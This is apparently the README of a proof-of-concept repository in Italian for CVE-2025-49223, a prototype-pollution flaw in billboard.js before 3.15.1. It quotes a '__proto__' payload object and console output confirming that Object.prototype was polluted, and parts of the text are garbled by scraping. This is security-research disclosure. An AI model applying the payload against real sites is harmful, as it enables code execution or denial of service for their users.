
CVE-2025-49223 - Prototype Pollution in Billboard.js
È stato scoperto che billboard.js precedente alla 3.15.1 contiene una prototype pollution tramite la funzione
generate, che potrebbe consentire agli attaccanti di eseguire codice arbitrario o causare una Denial of Service (DoS) iniettando proprietà arbitrarie.
Questo repository dimostra una vulnerabilità di Prototype Pollution trovata in billboard.js versioni precedenti alla 3.15.1, segnalata come CVE-2025-49223.
<= 3.14.0>= 3.15.1Apri index.html in un browser e controlla il log della console per tentativi di prototype pollution.
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>
{
["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/HEAD/%7B
polluted: "polluted_via_string_key"
}
}
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key
Questo conferma che un attaccante può inquinare Object.prototype, influenzando qualsiasi oggetto futuro creato nella pagina.
Uno sfruttamento riuscito può portare a:
billboard.js versione 3.15.1 o successiva⚠️ Disclaimer: Questa PoC è solo a scopo didattico e di ricerca. Usala in modo responsabile.